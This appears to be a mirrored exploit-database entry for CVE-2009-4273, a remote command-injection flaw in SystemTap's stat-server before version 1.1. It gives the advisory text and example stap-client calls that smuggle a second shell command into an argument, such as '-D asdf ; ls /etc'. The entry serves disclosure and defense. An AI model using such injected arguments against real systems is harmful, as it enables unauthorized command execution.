[] NeoSense
E X P L O I T S
title author type platform port cve id

SystemTap 1.0 - 'stat-server' Arbitrary Command Injection

Author: Frank Ch. Eigler
type: remote
platform: linux
port: nan
date_added: 2010-01-15 
date_updated: 2014-05-27 
verified: 1 
codes: CVE-2009-4273;OSVDB-61806 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/37842/info

SystemTap is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.

Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.

Versions prior to SystemTap 1.1 are vulnerable.


The following example commands are available:

stap-client \; ...
stap-client -; ...
stap-client -D 'asdf ; ls /etc' ...
stap-client -e 'script' -D 'asdf ; \; '
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.